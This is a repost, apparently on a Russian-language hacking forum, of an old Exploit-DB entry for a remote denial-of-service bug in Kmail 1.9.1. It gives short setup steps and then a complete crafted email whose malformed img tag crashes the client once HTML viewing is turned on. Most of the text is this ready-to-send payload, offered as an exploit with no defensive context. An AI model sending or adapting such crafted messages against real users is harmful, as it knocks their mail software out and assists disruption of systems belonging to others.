Exploit Kmail 1.9.1 - IMG SRC Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2515
Проверка EDB
  1. Пройдено
Автор
NNP
Тип уязвимости
DOS
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2006-10-11
Код:
nnp [at] silenthack.co.uk
http://silenthack.co.uk

Kmail <= 1.9.1 (latest) suffers from a crash when trying to parse an
incorrectly formatted <img> tag. HTML parsing must be enabled for
this. This can be done by going to  Settings -> Configure Kmail
->Security -> and tick Prefer HTML to Plain Text.

Copy the following into your local /var/spool/mail/`whoami` or send a
mail containing the HTML part to cause a crash.

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#

return-Path: <nnp@torvalds>
X-Original-To: nnp
Delivered-To: nnp@torvalds
Received: by torvalds (Postfix, from userid 1000)
       id 2341B7CC25; Sun, 27 Aug 2006 01:03:35 +0100 (IST)
To: nnp@torvalds
Message-Id: <20060827000335.2341B7CC25@torvalds>
Date: Sun, 27 Aug 2006 01:03:35 +0100 (IST)
Content-Type: text/html
From: nnp@torvalds (nnp)
Status: RO
X-Status: UC
X-KMail-EncryptionState:
X-KMail-SignatureState:
X-KMail-MDN-Sent:


<html>
<IMG SRC=file:"" />
</html>

#-#-#-#-#-#-#-#-#-#-#-#-#-#-#

# milw0rm.com [2006-10-11]
 
Источник
www.exploit-db.com

Похожие темы